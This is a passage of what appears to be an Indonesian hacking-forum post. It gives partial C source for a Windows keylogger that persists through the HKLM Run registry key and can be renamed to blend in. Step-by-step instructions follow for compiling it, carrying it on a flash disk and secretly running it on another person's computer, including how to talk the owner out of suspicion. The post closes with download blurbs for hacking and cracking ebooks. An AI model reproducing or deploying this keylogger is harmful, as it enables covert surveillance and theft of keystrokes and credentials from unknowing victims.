    reg_key=RegQueryValueEx(hKey,"Log",NULL,NULL,(LPBYTE)path,&buf_length);

    if((reg_key!=0)||(buf_length>BUFSIZE))
        check=2;
    if(reg_key==0)
        check=0;

    RegCloseKey(hKey);
    return check; 
}

int create_key(char *path)

        int reg_key,check;

        HKEY hkey;

        reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
        if(reg_key==0)
        {
                RegSetValueEx((HKEY)hkey,"Log",0,REG_SZ,(BYTE *)path,strlen(path));
                check=0;
                return check;
        }
        if(reg_key!=0)
                check=1;

        return check;
}

• Nah, setelah itu agan Complie atau run, tapi enakan klik Rebuild All, bias agan temukan di Execute>Rebuild All


• Nah berhubung program sudah jalan, wajib agan end process “Log.exe “nya di Windows Task Manager.Save program dengan nama “Log”.


• Sekarang, coba agan buka my document, pasti dah ada program nya “Log.exe” dan tempat hasil Log-an nya yang bernama “Log”


• Tetapi apabila anda ingin mengganti nama program nya menjadi nama yang anda ingin kan seperti contoh “Bagas”, bias anda ubah code nya di sini



Code:
1.char *path="c:\\%windir%\\Bagas.exe";/*the path in which the file needs to be*/

2.file=fopen("Bagas.log","a+");

3.reg_key=RegQueryValueEx(hKey,"Bagas",NULL,NULL,(LPBYTE)path,&buf_length);

4.    RegSetValueEx((HKEY)hkey,"Bagas",0,REG_SZ,(BYTE *)path,strlen(path));

• Na, kan sudah menjadi folder, tinggal agan copy ke flash disk


• Selanjutnya, tinggal agan jalanin aja di kompu orang lain lewat flash disk agan, untuk menghentikan “Log.exe’ / Keylogger nya, bisa kalian end process di Windows Task Manager / ctrl+alt+delete

• Tetapi kalau yang punya kompu Tanya “ko flash disk nya g d lepas?”, na tinggal basa-basi da ama yang punya computer,, hehehehhehehehe

Kumpulan Ebook Hacking & Cracking



Hacking Exposed
-: Hacking Exposed-5 :-
One of the international best-selling. The book walks through how to use the more powerful and popular hacker software, including L0phtCrack. This new edition has been updated extensively, largely with the results of "honeypot" exercises (in which attacks on sacrificial machines are monitored) and Windows 2000 public security trials. There's a lot of new stuff on e-mail worms, distributed denial-of-service (DDoS) attacks, and attacks that involve routing protocols. Hacking Exposed wastes no time in explaining how to implement the countermeasures--where they exist--that will render known attacks ineffective.
  Download  (Size :- 18.5 MB) 



Internet DoS
-: Internet Denial Of Service :-
Internet Denial of Service sheds light on a complex and fascinating form of computer attack that impacts the confidentiality, integrity, and availability of millions of computers worldwide. It tells the network administrator, corporate CTO, incident responder, and student how DDoS attacks are prepared and executed, how to think about DDoS, and how to arrange computer and network defenses. It also provides a suite of actions that can be taken before, during, and after an attack. Inside, you'll find comprehensive information on the each and every topic relating denial-of-service attacks.
  Download  (Size :- 2.04 MB) 



Viruses for Dummies
-: Computer Viruses For Dummies :-
It offers real, practical solutions to help ordinary users keep viruses out of their e-mail in-boxes-and explains how to respond when one slips through-
* In 2003, there was a major virus attack almost every month, which cost businesses worldwide an estimated $55 billion and did untold damage to home computers.
* Explains what viruses are and how they work, profiles major anti-virus software packages, shows how to keep anti-virus software updated, and helps people adopt safer computer work habits.
* The book\92s value price and compact size will make it irresistible to people who need to protect their home PC or network.
  Download  (Size :- 2.33 MB) 



Hackin9
-: Hackin9 :-

This book will help you learn :-
* How to use Google to find sources of personal information and other confidential data.
* How to find information about vulnerable systems and Web services.
* How to locate publicly available network devices using Google.
  Download  (Size :- 1.78 MB)